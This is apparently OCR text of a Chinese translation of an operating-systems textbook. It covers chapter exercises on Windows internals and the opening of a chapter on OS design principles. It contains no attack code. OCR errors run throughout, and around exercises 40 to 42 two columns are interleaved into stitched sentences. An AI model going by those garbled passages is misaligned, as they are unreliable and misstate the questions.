Windows 在 最 近 的 发 行 版 本 中 增加 了 大 量 的 安全 特性 ， 包 括 用 BitLocker 来 加 密 整 个 卷 ， 采 用 地 址 空间 随 
机 化 ， 不 可 执行 的 堆栈 以 及 其 他 措施 使 得 缓冲 区 溢出 攻击 更 加 困难 。 


习题 


1. 给 出 注册 文件 和 单个 ,ini 文件 的 一 个 优势 和 一 个 
劣势 。 

.鼠标 可 包含 一 个 、 两 个 或 三 个 按钮 ， 三 种 类 型 
都 可 用 。HAL 是 否 在 操作 系统 的 其 他 地 方 隐藏 
了 这 个 差异 ? 为 什么 ? 

. HAL 可 以 跟踪 从 1601 年 开始 的 所 有 时 间 。 举 一 
个 例子 ， 说 明 这 项 功能 的 用 途 。 

.在 11.3.3 节 ， 我 们 介绍 了 在 多 线程 应 用 程序 中 一 
个 线程 关闭 了 句柄 而 另 一 个 线程 仍然 在 使 用 它 
们 所 造成 的 问题 。 解 决 此 问题 的 一 种 可 能 性 是 
插入 序列 域 。 请 问 该 方法 是 如 何 起 作用 的 ? 需 
要 对 系统 做 哪些 修改 ? 

.执行 文件 中 的 许多 部 分 (图 11-11) 都 调用 了 文 
件 中 的 其 他 部 分 ， 举 出 某 一 部 分 调用 另外 一 部 
分 的 三 个 例子 ， 总 共 是 六 部 分 。 

. Win32 系统 没有 信号 功能 。 如 果 要 引入 此 功能 ， 
我 们 可 以 将 信号 设置 为 进程 所 有 ， 线 程 所 有 ， 
两 者 都 有 或 者 两 者 都 没有 s 试 着 提出 一 项 建议 ， 
并 解释 为 什么 。 

7. 另 一 种 使 用 DLL 的 方式 是 静态 地 将 每 个 程序 链 
接 到 它 实 际 调用 到 那些 库 函 数 ， 既 不 多 也 不 少 。 
在 客户 端 机 器 或 者 服务 器 机 器 上 引入 此 方法 ， 
哪个 更 合理 ? 

.在 Windows 中 线程 拥有 独立 的 用 户 态 栈 和 内 核 
态 栈 的 原因 是 哪些 ? 

9.TLB 对 性 能 有 重大 的 影响 。 为 了 提高 TLB 的 有 
效 性 ，Windows 使 用 了 大 小 为 2MB 的 页 ， 这 是 
什么 ? 为 什么 2MB 的 页 面 没有 一 直 使 用 ? 

10. 在 一 个 执行 体 对 象 上 可 定义 的 不 同 操作 的 数量 
有 没有 限制 ? 如 果 有 ， 这 个 限制 从 何 而 来 ?如 
果 没 有 ， 请 说 明 为 什么 。 

. Win32 API 的 调用 WaitForMultipleObjects 以 
一 组 同步 对 象 的 句柄 为 参数 ， 使 得 线程 被 这 组 
同步 对 象 阻 塞 。 一 旦 它们 中 的 任何 一 个 收 到 信 
号 ， 调 用 者 线程 就 会 被 释放 。 这 组 同步 对 象 是 
否 可 以 包含 两 个 信号 灯 、 一 个 互 斥 体 和 一 个 临 
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界 区 ? 理由 是 什么 ? 提示 : 这 不 是 一 个 恶作剧 
的 问题 ， 但 确实 有 必要 认真 考虑 一 番 。 


.在 多 线程 程序 中 初始 化 全 局 变量 的 时 候 ， 人 允许 


这 个 变量 被 两 次 初始 化 的 竞争 条 件 是 一 个 常见 
的 程序 错误 。 为 什么 会 发 生 这 种 情况 ? 
Windows 提 供 了 InitOnceExcuteOnce API 来 阻 
止 这 种 情况 的 发 生 ， 它 是 怎样 执行 的 ? 

给 出 三 个 可 能 会 终止 线程 的 原因 。 导 致 一 个 进 
程 结束 一 个 现代 应 用 程序 的 附加 原因 是 什么 ? 


.用 户 每 次 从 应 用 程序 切换 出 去 的 时 候 ， 现 代 应 


用 程序 都 必须 要 将 它们 的 状态 保存 到 磁盘 。 这 
样 看 起 来 效率 比较 低 ， 因 为 用 户 可 能 会 多 次 切 
换 回 这 个 应 用 程序 ， 然 后 这 个 应 用 程序 就 简单 
地 重新 启动 运行 。 操 作 系统 为 什么 要 求 应 用 程 
序 如 此 频繁 地 保存 它们 的 状态 ， 而 不 是 在 这 个 
点 上 就 让 它们 真正 结束 运行 ? 

如 11.4 节 所 述 ， 有 一 个 特殊 的 句柄 表 用 于 为 进 
程 和 线程 分 配 ID 。 句 柄 表 的 算法 通常 是 分 配 
第 一 个 可 用 的 句柄 (按照 后 进 先 出 的 顺序 维护 
空闲 链表 ) 。 在 最 新 发 布 的 Windows 版 本 中 ， 
该 算法 变 成 了 ID 表 总 是 以 先进 先 出 的 顺序 跟 
踪 空 闲 链表 。 使 用 后 进 先 出 顺序 分 配 进程 线 
ID 有 什么 潜在 的 问题 ?为 什么 .UX 操作 系统 没 
有 这 个 问题 ? 


.假设 时 间 片 配额 被 设置 为 20 毫秒 ， 当 前 优先 


级 为 24 的 线程 在 配额 开始 的 时 候 刚 开始 执行 。 
突然 一 个 IO 操作 完成 了 并 且 一 个 优先 级 为 28 
的 线程 变 成 就 绪 状 态 。 这 个 线程 需要 等 待 多 久 
才 可 以 使 用 CPU? 


.在 Windows 中 ， 当 前 的 优先 级 总 是 大 于 或 等 于 


基本 的 优先 级 。 是 否 在 某 些 情况 下 当前 的 优先 
级 低 于 基本 的 优先 级 也 是 有 意义 的 ? 若 有 ， 请 
举例 。 否 则 请 说 明 原因 。 


. Windows 利 用 一 个 叫 作 AutoBoost 的 设施 来 短 


暂 地 提升 拥有 高 优先 级 所 需要 的 资源 的 进程 的 
优先 级 ， 你 认为 它 是 怎样 工作 的 ? 
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19. 在 Windows 中 很 容易 实现 一 些 设施 将 运行 在 
内 核 中 的 线程 临时 依附 到 其 他 进程 的 地 址 空 
间 。 为 什么 在 用 户 态 却 很 难 实现 ? 这 样 做 有 
何 目的 ? 

20. 说 出 两 种 在 重要 进程 中 对 线程 提供 更 好 的 响应 
时 间 的 方式 ? 

21 即使 有 很 多 空闲 的 可 用 内 存 而 且 内 存 管理 器 也 
不 需要 调整 工作 集 ， 分 页 系统 仍然 会 经 常 对 磁 
盘 进 行 写 操作 。 为 什么 ? 

22. Windows 为 现代 应 用 程序 交换 进程 而 不 是 减少 它 
们 的 工作 集 或 者 给 它们 换 页 ， 为 什么 这 样 是 更 
有 效 的 ? (提示 : 当 磁 盘 是 SSD 时 区 别 不 大 。) 

23. 为 什么 用 来 访问 进程 页 目录 和 页 表 的 物理 页 面 
的 自身 映射 数据 总 是 占用 同一 片 8SMB 的 内 核 虚 
拟 地 址 空间 (在 x86 上 ) ? 

24. x86 机 器 既 能 使 用 64 位 的 页 表 项 ， 又 能 使 用 32 
位 的 页 表 项 。. Windows 使 用 64 位 的 页 表 项 ， 所 
以 系统 能 够 访问 超过 4GB 的 内 存 空间 。 对 于 32 
位 的 页 表 项 ， 自 映射 在 页 目录 中 只 用 一 个 页 目 
录 项 ， 因 此 只 占用 4MB 而 不 是 8MB 的 地 址 空 
间 ， 为 什么 会 这 样 ? 

25. 如 果 保 留 了 一 段 虚 拟 地 址 空间 但 是 没有 提交 
它 ， 你 认为 系统 会 为 其 创建 一 个 VAD 吗 ? 请 证 
明 你 的 答案 。 

26. 在 图 11-34 中 ， 哪 些 转移 是 由 策略 决定 的 ， 而 
不 是 由 系统 事件 (例如 ， 一 个 进程 退出 并 释放 
其 页 面 ) 所 强迫 的 转移 ? 

27. 假设 一 个 页 面 被 共享 并 且 同 时 存在 于 两 个 工作 
集中 。 如 果 它 从 一 个 工作 集 移出 ， 在 图 11-34 
中 它 将 会 到 哪里 去 ? 当 它 从 第 二 个 工作 集 移出 
时 会 发 生 什么 ? 

28. 当 进 程 取 消 对 一 个 页 面 的 映射 时 , 干净 的 页 会 
进行 图 11-36 中 的 转移 (5)， 那 脏 的 栈 页 怎样 
处 理 呢 ? 为 什么 脏 的 栈 页 面 被 取消 映射 时 不 会 
被 转移 到 已 修改 列表 中 呢 ? 

29. 假设 一 个 代表 某 种 类 型 互 斥 锁 (比如 互 斥 对 象 ) 
的 分 发 对 象 被 标记 为 使 用 通知 事件 而 不 是 同步 
事件 来 声明 锁 被 释放 。 为 什么 这 样 是 不 好 的 ? 
你 的 回答 在 多 大 程度 上 依赖 于 锁 被 持 有 的 时 间 、 
时 间 片 配额 的 长 度 和 系统 是 否 为 多 处 理 器 的 ? 

30. 为 了 支持 POSIX， 原 生 NtCreateProcess API 
许 复制 一 个 进程 以 支持 fork。 在 UNIX 中 ， 大 
多 数 时 候 fork 后 面 都 简单 地 跟着 一 个 exec。 
Berkeley dump(8S) 程 序 是 曾经 使 用 这 一 方式 的 
一 个 例子 ， 它 能 够 从 磁盘 备份 到 磁带 。 如 果 磁 
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带 设备 中 有 和 错误， 那么 fork 将 作为 和 卸载 程序 检 
查 点 以 实现 重启 。 举 出 一 个 Windows 可 能 使 用 
NtCreateProcess 来 做 类 似 事 情 的 例子 。( 提 示 : 
考虑 拥有 DLL 来 执行 第 三 方 提供 的 函数 的 进 
程 。) 


-一 个 文件 存在 如 下 映射 。 请 给 出 MFT 的 行 串 。 


偏 移 和 
磁盘 地 址 50 51 52 22 24 25 26 53 54 — 60 


考虑 图 11-41 中 的 MFT 记 录 。 假 设 该 文件 增长 
了 并 且 在 文件 的 末尾 添加 了 第 10 个 块 。 新 块 的 
序号 是 66。 现 在 MFT 记 录 会 是 什么 样子 ? 


. 在 图 11-44b 中 ， 最 先 的 两 个 行 串 的 长 度 都 为 8 


个 块 。 你 觉得 它们 长 度 相 等 只 是 偶然 的 ， 还 
是 跟 压缩 的 工作 方式 有 关 ? 请 解释 理由 。 


.假如 您 想 创建 Windows 的 精简 版 。 在 图 11-45 


中 可 以 取消 哪些 字段 而 不 削弱 系统 的 安全 性 ? 


.用 于 改善 安全 性 以 防止 漏洞 持续 出 现 的 缓解 策 


略 是 非常 成 功 的 。 现 代 的 攻击 技术 是 非常 复杂 
的 ， 经 常 需 要 利用 出 现 的 多 个 漏洞 来 展开 有 效 
攻击 , 其 中 一 个 经 常用 到 的 漏洞 就 是 信息 泄露 。 
解释 一 下 攻击 者 怎样 利用 信息 泄露 来 “击破 ” 
地 址 空间 的 随机 分 配 ， 从 而 发 动 基于 面向 
return 编 程 的 攻击 。 

由 许多 程序 (Web 浏 览 器 、Office、COM 服务 
器 ) 使 用 的 一 个 扩展 模型 是 对 程序 所 包含 的 
DLL 添 加 钧 子 函数 来 扩展 其 底层 功能 。 只 要 在 
加 载 DLL 前 仔细 模拟 客户 的 身份 ， 该 模型 对 基 
于 RPC 的 服务 来 说 就 是 合理 的 ， 是 这 样 的 吗 ? 
为 什么 不 是 ? 

在 NUMA 机 器 上 ， 不 管 何 时 Windows 内 存 管理 
器 需要 分 配 物理 内 存 来 处 理 页 面 失效 ， 它 总 尝 
试 从 当前 线程 的 理想 的 处 理 器 的 NUMA 节 点 中 
获取 。 为 什么 ?如 果 线 程 正 运行 在 其 他 处 理 器 
EWE? 

系统 崩溃 时 ， 应 用 程序 可 以 轻易 地 从 基于 卷 的 
影子 副本 的 备份 中 恢复 ， 而 不 是 从 磁盘 状态 中 
恢复 。 请 给 出 几 个 这 样 的 例子 。 

在 某 些 情 况 下 为 了 满足 安全 性 的 要 求 需要 为 进 
程 提供 全 零 的 页 面 ， 在 11.9 节 中 向 进程 的 堆 提 
供 内 存 就 是 这 样 的 一 种 情况 。 请 给 出 一 个 或 者 
多 个 其 他 需要 对 页 面 清 零 的 虚拟 内 存 操作 。 


. Windows 包 含 一 个 管理 程序 ， 人 允许 多 个 操作 系 


统 同 时 运行 。 这 在 客户 端 是 可 行 的 ， 但 是 在 云 
计算 方面 更 加 重要 。 当 一 个 安全 更 新 被 安装 到 
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普通 用 户 权 限 的 操作 系统 上 时 ， 这 相当 于 给 服 装 软件 或 硬件 ， 请 找 出 安装 或 印 载 程序 或 设备 
务 器 打 了 个 补丁 包 。 然 而 ， 当 一 个 安全 更 新 被 时 注册 表 有 何 变化 。 

安装 到 root 权 限 的 操作 系统 上 时 ， 这 对 云 计算 ”42. 写 一 个 UNIX 程 序 ， 模 拟 用 多 个 流 来 写 一 个 
的 用 户 来 说 就 是 一 个 大 问题 。 这 个 问题 的 本 质 NTFS 文 件 。 它 应 能 接受 一 个 或 多 个 文件 作为 


是 什么 ? 针对 这 个 问题 能 做 点 什么 ? 参数 ， 并 创建 一 个 输出 文件 ， 该 文件 的 一 个 流 

41. 在 当前 所 有 的 Windows 发 行 版 本 中 ，regedit 包含 所 有 参数 的 属性 ， 其 他 的 流 包含 每 个 参数 
命令 可 用 于 导出 部 分 或 全 部 注册 表 到 一 个 文本 的 内 容 。 然 后 再 写 一 个 程序 来 报告 这 些 属性 和 
文件 。 在 一 次 工作 会 话 中 保存 注册 表 若 干 次 ， 流 并 提取 出 所 有 的 组 成 成 分 。 


看 看 有 什么 变化 。 如 果 您 能 够 在 Windows 中 安 
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在 前 面 的 11 章 中 ， 我 们 讨论 了 许多 话题 ， 并 且 分 析 了 许多 与 操作 系统 相关 的 概念 和 实例 。 但 是 研究 
现 有 的 操作 系统 不 同 于 设计 一 个 新 的 操作 系统 。 在 本 章 中 ， 我 们 将 简 述 操作 系统 设计 人 员 在 设计 与 实现 
一 个 新 的 操作 系统 时 必须 要 考虑 的 一 些 问题 和 权衡 。 

在 系统 设计 方面 ， 关 于 设计 的 好 与 坏 ， 存 在 着 各 种 业界 传说 ， 并 在 操作 系统 界 流传 ,但 是 令 人 惊讶 
的 是 ， 这 些 业 界 传说 很 少 被 记录 下 来 。 最 重要 的 一 本 书 可 能 就 是 Fred Brooks 的 经 典 著作 《The Mythical 
Man Month) (中文 译名 《人 月 神话 》)。 在 这 本 书 中 ， 作 者 讲述 了 他 在 设计 与 实现 IBM OS/360 系 统 时 的 
经 历 。 该 书 的 20 周 年 纪念 版 修订 了 某 些 内 容 并 且 新 增加 了 4 个 章节 (Brooks, 1995), 

有 关 操 作 系 统 设计 的 三 篇 经 典 论 文 是 “Hints for Computer System Design”( 计 算 机 系统 设计 的 忠告 ， 
Lampson, 1984), “On Building Systems that Will Fail”( 论 建造 将 要 失败 的 系统 ，Corbat6, 1991) 和 
“End-to-End Arguments in System Design”( 系 统 设计 中 端 到 端 问 题 ，Saltzer 等 人 ，1984)。 与 Brooks 的 
著作 一 样 ， 这 三 篇 论文 都 极其 出 色 地 经 受 住 了 岁月 的 考验 ， 其 中 的 大 多 数 真知 灼 见 在 今天 仍然 像 文 章 首 
次 发 表 时 一 样 有 价值 。 

本 章 借鉴 了 这 些 资 料 ， 同 时 加 上 了 作者 作为 两 个 系统 的 设计 者 或 共同 设计 者 的 个 人 经 历 ， 这 两 个 系 
统 是 : Amoeba (Tanenbaum 等 人 ，1990) 和 MINIX (Tanenbaum 和 Woodhull, 2006) 。 由 于 操作 系统 设计 
人 员 在 设计 操作 系统 的 最 优 方 法 上 没有 达成 共识 ， 因 此 与 前 面 各 章 相 比 ， 本 章 更 加 主观 ， 也 无 疑 更 具有 
争议 。 


12.1 设计 问题 的 本 质 


操作 系统 设计 与 其 说 是 精确 的 科学 ， 不 如 说 是 一 个 工程 项 目 。 设 置 清晰 的 目标 并 且 满足 这 些 目标 非 
常 困 难 。 我 们 将 从 这 些 观点 开始 讨论 。 


12.1.1 目标 

为 了 设计 一 个 成 功 的 操作 系统 ， 设 计 人 员 对 于 需要 什么 必须 有 清晰 的 思路 。 缺 乏 目 标 将 使 随后 的 决 
策 非 常 难于 做 出 。 为 了 明确 这 一 点 ， 看 一 看 两 种 程序 设计 语言 PL/I 语 言 和 C 语 言 会 有 所 启发 。PL/I 语 言 
是 IBM 公 司 在 20 世 纪 60 年 代 设计 的 ， 因 为 在 当时 必须 支持 FORTRAN 和 COBOL 是 一 件 令 人 讨厌 的 事 ， 同 
时 令 人 尴 论 的 是 ， 学 术 界 背地 里 喷 喷 着 Algol 比 这 两 种 语言 都 要 好 。 所 以 IBM 设 立 了 一 个 委员 会 来 创作 一 
种 语言 ， 该 语言 力图 满足 所 有 人 的 需要 ， 这 种 语言 就 是 PL/1。 它 具有 一 些 FORTRAN 的 特点 、 一 些 
COBOL 的 特点 和 一 些 Algol 的 特点 。 但 是 该 语言 失败 了 ， 因 为 它 缺 乏 统一 的 愿景 。 它 只 是 彼此 互相 竞争 
的 功能 特性 的 大 杂烩 ， 并 且 过 于 笨重 而 不 能 有 效 地 编译 。 

现在 来 看 C 语 言 。 它 是 一 个 人 (Dennis Ritchie) 为 了 一 个 目的 (系统 程序 设计 ) 而 设计 的 。C 语 言 
在 所 有 的 方面 都 取得 了 巨大 的 成 功 ， 因 为 Ritchie 知 道 他 需要 什么 ， 不 需要 什么 。 结果， 在 面世 几 十 年 之 
后 ，C 语 言 仍然 在 广泛 使 用 。 对 于 需要 什么 要 有 一 个 清晰 的 愿景 是 至 关 重 要 的 。 

操作 系统 设计 人 员 需 要 什么 ? 很 明显 ， 不 同 的 系统 会 有 所 不 同 ， 贬 入 式 系统 就 不 同 于 服务 器 系统 。 
然而 ， 对 于 通用 的 操作 系统 而 言 ， 需 要 留心 4 个 基本 的 要 素 : 

1) 定义 抽象 概念 。 

2) 提供 基本 操作 。 

3) 确保 隔离。 

4) 管理 硬件 。 
下 面 将 描述 这 些 要 素 。 

一 个 操作 系统 最 重要 但 可 能 最 困难 的 任务 是 定义 正确 的 抽象 概念 。 有 一 些 抽象 概念 ， 例 如 进程 和 文 
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件 ， 多 年 以 前 就 已 经 提出 来 了 ， 似 乎 比较 显而易见 。 其 他 一 些 抽象 概念 ， 警 如 线程 ， 还 比较 新 ， 就 不 那 
么 成 熟 了 。 例 如 ， 如 果 一 个 多 线程 的 进程 有 一 个 线程 由 于 等 待 键盘 输入 而 阻塞 ， 那 么 由 这 个 进程 通过 调 
用 fork 函 数 创 建 的 新 进程 是 否 也 包含 一 个 等 待 键盘 输入 的 线程 ”其 他 的 抽象 概念 涉及 同步 、 信 和 号、 内存 
模型 、L/O 建 模 以 及 其 他 领域 。 

每 一 个 抽象 概念 可 以 通过 具体 数据 结构 的 形式 来 实例 化 。 用 户 可 以 创建 进程 、 文 件 、 信 号 量 等 。 基 本 
操作 则 处 理 这 些 数据 结构 。 例 如 ， 用 户 可 以 读 写 文件 。 基 本 操作 以 系统 调用 的 形式 实现 。 从 用 户 的 观点 来 
看 ， 操 作 系统 的 核心 是 由 抽象 概念 与 其 上 的 基本 操作 所 构成 的 ， 而 基本 操作 则 可 通过 系统 调用 加 以 利用 。 

由 于 某 些 计算 机 上 的 多 个 用 户 可 以 同时 登录 到 一 台 计 算 机 ， 操 作 系统 需要 提供 机 制 将 他 们 隔离 。 一 
个 用 户 不 可 以 干扰 另 一 个 用 户 。 为 了 保护 的 目的 ， 进 程 概念 广泛 地 用 于 将 资源 集合 在 一 起 。 文 件 和 其 他 
数据 结构 一 般 也 是 受 保护 的 。 另 一 个 需要 隔离 的 方面 是 虚拟 化 : 管理 程序 必须 确保 虚拟 机 之 间 不 会 互相 
干扰 。 确 保 每 个 用 户 只 能 在 授权 的 数据 上 执行 授权 的 操作 是 系统 设计 的 关键 目标 。 然 而 ， 用 户 还 希望 共 
享 数据 和 资源 ， 因 此 隔离 必须 是 选择 性 的 并 且 要 在 用 户 的 控制 之 下 。 这 就 使 问题 更 加 复杂 化 了 。 电 子 邮 
件 程 序 不 应 该 弄 坏 Web 浏 览 器 程序 ， 即 使 只 有 一 个 用 户 ， 不 同 的 进程 也 应 该 隔离 开 来 。 在 一 些 系统 中 
(比如 Android) ， 同 一 个 用 户 启动 不 同 的 进程 时 会 分 配 不 同 的 用 户 ID ， 以 此 来 进行 进程 间隔 离 。 

与 这 一 要 点 密切 相关 的 是 需要 隔离 故障 。 如 果 系 统 的 某 一 部 分 崩溃 〈 最 为 一 般 的 是 一 个 用 户 进程 崩 
种) ， 不 应 该 使 系统 的 其 余部 分 随 之 崩溃 。 系 统 设 计 应 该 确保 系统 的 不 同 部 分 良好 地 相互 隔离 。 从 理想 
的 角度 看 ， 操 作 系统 的 各 部 分 也 应 该 相互 隔离 ， 以 便 使 故障 独立 。 操 作 系 统 也 应 该 具有 容错 性 和 自我 恢 
复 的 功能 。 

最 后 ， 操 作 系 统 必须 管理 硬件 。 特 别 地 ， 它 必须 处 理 所 有 低级 芯片 ， 例 如 中 断 控制 器 和 总 线 控制 器 。 
它 还 必须 提供 一 个 框架 ， 从 而 使 设备 驱动 程序 得 以 管理 更 大 型 的 IO 设备 ， 例 如 磁盘 、 打 印 机 和 显示 器 。 


12.1.2 设计 操作 系统 为 什么 困难 

摩尔 定律 表明 计算 机 硬件 每 十 年 改进 100 倍 ， 但 却 没 有 一 个 定律 宣称 操作 系统 每 十 年 改进 100 倍 。 甚 
至 没有 人 能 够 宣称 操作 系统 每 十 年 在 某 种 程度 上 会 有 所 改善 。 事 实 上 ， 可 以 举 出 事例 ， 一 些 操作 系统 在 
很 多 重要 的 方面 (例如 可 靠 性 ) 比 20 世 纪 70 年 代 的 UNIX 版 本 7 还 要 糟糕 。 

为 什么 会 这 样 ? 惯性 和 向 后 兼容 的 愿望 常 被 认为 是 主要 原因 ， 不 能 坚持 良好 的 设计 原则 也 是 问题 的 
根源 。 但 是 远 远 不 止 这 些 。 操 作 系统 在 特定 的 方面 根本 不 同 于 计算 机 商店 以 49 美 元 就 可 以 购买 下 载 的 小 
型 应 用 程序 。 我 们 下 面 就 看 8 个 问题 ， 这 些 问题 使 设计 一 个 操作 系统 比 设计 一 个 应 用 程序 更 加 困难 。 

第 一 ， 操 作 系统 已 经 成 为 极其 庞大 的 程序 。 没 有 一 个 人 能 够 坐 在 一 台 PC 前 ， 用 几 个 月 甚至 几 年 时 
间 完 成 一 个 严肃 的 操作 系统 。UNIX 的 所 有 当前 版 本 总 共有 成 百 上 千 万 行 代码 ， 比 如 Linux 就 有 1500 万 
行 代码 ，Windows 8 大 概 有 5000 万 到 1 亿 行 代码 (这 与 统计 方式 有 关 ，Window Vista 有 7000 万 行 代码 ， 
但 是 随 着 代码 的 增删 会 有 一 些 变动 )。 没 有 一 个 人 能 够 理解 几 万 行 代码 ,更 不 必 说 5000 万 到 上 亿 行 代码 。 
当 你 拥有 一 件 产品 时 ， 如 果 没 有 一 名 设计 师 能 够 有 望 完全 理解 它 ， 那 么 结果 远 谈 不 上 优秀 也 就 不 难 预 
料 了 。 

操作 系统 不 是 世界 上 最 复杂 的 系统 ， 例 如 ， 航 空 母 舰 就 要 复杂 得 多 ， 但 是 航空 母 舰 能 够 更 好 地 分 成 
相互 隔离 的 部 分 。 设 计 航 空 母 舰 上 的 卫生 间 的 人 员 根 本 不 必 关 心 雷达 系统 ， 这 两 个 子 系统 没有 什么 相互 
作用 。 没 有 事例 表明 航空 母 舰 上 一 个 堵 住 的 卫生 间 会 导致 舰艇 发 射 导 弹 。 而 在 操作 系统 中 ， 文 件 系统 经 
常 以 意外 和 无 法 预料 的 方式 与 内 存 系统 相互 作用 。 

第 二 ， 操 作 系统 必须 处 理 并 发 。 系 统 中 往往 存在 多 个 用 户 和 多 个 设备 同时 处 于 活动 状态 。 管 理 并 发 
自然 要 比 管理 单一 的 顺序 活动 复杂 得 多 。 竞 争 条 件 和 死 锁 只 是 出 现 的 众多 问题 中 的 两 个 。 

第 三 ， 操 作 系 统 必 须 处 理 可 能 有 敌意 的 用 户 一 一 想 要 干扰 系统 的 用 户 或 者 做 不 允许 做 的 事情 (例如 
偷窃 另 一 个 用 户 的 文件 ) 的 用 户 。 操 作 系统 需要 采取 措施 阻止 这 些 用 户 不 正当 的 行为 ， 而 字 处 理 程序 和 
照片 编辑 程序 就 不 存在 这 样 的 问题 。 

第 四 ， 尽 管事 实 上 并 非 所 有 的 用 户 都 相信 其 他 用 户 ， 但 是 许多 用 户 确实 希望 与 经 过 选择 的 其 他 用 户 
共享 他 们 的 信息 和 资源 。 操 作 系统 必须 使 其 成 为 可 能 ， 但 是 要 以 确保 怀 有 恶意 的 用 户 不 能 妨害 的 方式 。 
而 应 用 程序 就 不 会 面 对 类 似 这 样 的 挑战 。 
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第 五 ， 操 作 系统 已 经 问世 很 长 时 间 了 。UNIX 已 经 历 了 40 年 ，Windows 面 世 也 已 经 超过 30 年 并 且 还 没 
有 消失 的 迹象 。 因 此 ， 设 计 人 员 必 须 思考 硬件 和 应 用 程序 在 遥远 的 未 来 可 能 会 发 生 何 种 变化 ， 并 且 考 虑 
为 这 样 的 变化 做 怎样 的 准备 。 被 锁定 在 一 个 特定 视野 中 的 系统 通常 会 死亡 。 

第 六 ， 操 作 系 统 设计 人 员 对 于 他 们 的 系统 将 怎样 被 人 使 用 实际 上 并 没有 确切 的 概念 ， 所 以 他 们 需要 
提供 相当 程度 的 通用 性 。UNIX 和 Windows 在 设计 时 都 没有 把 Web 浏 览 器 或 高 清 视频 播放 器 放 在 心 上 ， 然 
而 许多 运行 这 些 系统 的 计算 机 却 很 少 做 其 他 的 事情 。 人 们 在 告诉 一 名 轮船 设计 师 建 造 一 稻 轮 船 时 ， 却 会 
指明 他 想 要 的 是 渔船 、 游 船 还 是 战舰 ， 并 且 当 产品 生产 出 来 之 后 鲜 有 人 会 改变 产品 的 用 途 。 

第 七 ， 现 代 操 作 系 统一 般 被 设计 成 可 移植 的 ， 这 意味 着 它们 必须 运行 在 多 个 硬件 平台 上 。 它 们 还 必 
须 支持 上 千 个 IO 设备 ， 所 有 这 些 IO 设备 都 是 独立 设计 的 ， 彼 此 之 间 设 有 关系 。 这 样 的 差异 可 能 会 导致 
问题 ， 一 个 例子 是 操作 系统 需要 运行 在 小 端 机 器 和 大 端 机 器 上 。 第 二 个 例子 经 常 在 MS-DOS 下 看 到 ， 用 
户 试图 安装 一 块 声卡 和 一 个 调制 解 调 器 ， 而 它们 使 用 了 相同 的 IO 端口 或 者 中 断 请 求 线 。 除 了 操作 系统 
以 外 ， 很 少 有 程序 必须 处 理由 于 硬件 部 件 冲 突 而 导致 的 这 类 问题 。 

第 八 ， 也 是 最 后 一 个 问题 ， 是 经 常 需要 与 某 个 从 前 的 操作 系统 保持 向 后 兼容 。 以 前 的 那个 系统 可 能 在 
字 长 、 文 件 名 或 者 其 他 方面 有 所 限制 ， 而 在 设计 人 员 现在 看 来 这 些 限 制 都 是 过 时 的 ， 但 是 却 必 须 坚 持 。 这 
就 像 让 一 家 工厂 转 而 去 生产 下 一 年 的 汽车 而 不 是 这 一 年 的 汽车 的 同时 ， 继 续 全 力 地 去 生产 这 一 年 的 汽车 。 
12.2 接口 设计 

到 现在 读者 应 该 清楚 ， 编 写 一 个 现代 操作 系统 并 不 容易 。 但 是 人 们 要 从 何 处 开始 呢 ? 可 能 最 好 的 起 
点 是 考虑 操作 系统 提供 的 接口 。 操 作 系统 提供 了 一 组 抽象 ， 主 要 是 数据 类 型 《例如 文件 ) 以 及 其 上 的 操 
Ye 〈 例 如 read)。 它 们 合 起 来 形成 了 对 用 户 的 接口 。 注 意 ， 在 这 一 上 下 文中 操作 系统 的 用 户 是 指 编写 使 
用 系统 调用 的 代码 的 程序 员 ， 而 不 是 运行 应 用 程序 的 人 员 。 

除了 主要 的 系统 调用 接口 ， 大 多 数 操作 系统 还 具有 另外 的 接口 。 例 如 ， 某 些 程序 员 需 要 编写 插入 到 
操作 系统 中 的 设备 驱动 程序 。 这 些 驱动 程序 可 以 看 到 操作 系统 的 某 些 功能 特性 并 且 能 够 发 出 某 些 过 程 调 
用 。 这 些 功能 特性 和 调用 也 定义 了 接口 ， 但 是 与 应 用 程序 员 看 到 的 接口 完全 不 同 。 如 果 一 个 系统 要 取得 
成 功 ， 所 有 这 些 接口 都 必须 仔细 设计 。 


12.2.1 指导 原则 

有 没有 可 以 指导 接口 设计 的 原则 呢 ? 我 们 认为 是 有 的 。 简 而 言 之 ， 原 则 就 是 简单 、 完 备 和 能 够 有 效 
地 实现 。 

原则 1: 简单 

一 个 简单 的 接口 更 加 易于 理解 并 且 更 加 易于 以 无 差错 的 方式 实现 。 所 有 的 系统 设计 人 员 都 应 该 牢记 
法 国 先 驱 飞 行家 和 作家 Antoine de St. Exupéry 的 著名 格言 : 

不 是 当 没 有 东西 可 以 再 添加 ， 而 是 当 没 有 东西 可 以 再 裁减 时 ， 才 能 达到 尽善尽美 。 

如 果 你 很 挑剔 ， 觉 得 他 没有 这 么 说 过 ， 那 么 请 看 原文 法文 ) ; 

Il semble que la perfection soit atteinte non quand il n'y a plus rien à ajouter, mais quand il n'y a plus 
rien à retrancher. 

只 要 理解 这 句 话 ， 怎 么 记 都 无 所 谓 。 

这 一 原则 说 的 是 少 比 多 好 ， 至 少 在 操作 系统 本 身 中 是 这 样 。 这 一 原则 的 另 一 种 说 法 是 KISS 原 则 : 
Keep It Simple, Stupid (保持 简朴 无 华 ) 。 

原则 2: 完备 

当然 ， 接 口 必 须 能 够 做 用 户 需要 做 的 一 切 事情 ， 也 就 是 说 ， 它 必须 是 完备 的 。 这 使 我 们 想起 了 另 一 
条 著名 的 格言 ，Albert Einstein (阿尔 伯 特 * 爱 因 斯 坦 ) 说 过 : 

万 事 都 应 该 尽 可 能 简单 ， 但 是 不 能 过 于 简单 。 

换言之 ， 操 作 系统 应 该 不 多 不 少 准 确 地 做 它 需要 做 的 事情 。 如 果 用 户 需要 存储 数据 ， 它 就 必须 提供 存 
储 数据 的 机 制 ， 如 果 用 户 需 要 与 其 他 用 户 通 信 ， 操 作 系统 就 必须 提供 通信 机 制 ， 如 此 等 等 。1991 年 ，CTSS 
和 MULTICS 的 设计 者 之 一 Fernando Corbat6 在 他 的 图 灵 奖 演说 中 ， 将 简单 和 完备 的 概念 结合 起 来 并 且 指 出 : 
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首先 ， 重 要 的 是 强调 简单 和 精练 的 价值 ， 因 为 复杂 容易 导致 增加 困难 并 且 产 生 错 误 ， 正 如 我 们 已 经 
看 到 的 那样 。 我 对 精练 的 定义 是 以 机 制 的 最 少 化 和 清晰 度 的 最 大 化 实现 特定 的 功能 。 

此 处 重要 的 思想 是 机 制 的 最 少 化 (minimum of mechanism) 。 换 言 之 ， 每 一 个 特性 、 功 能 和 系统 调 
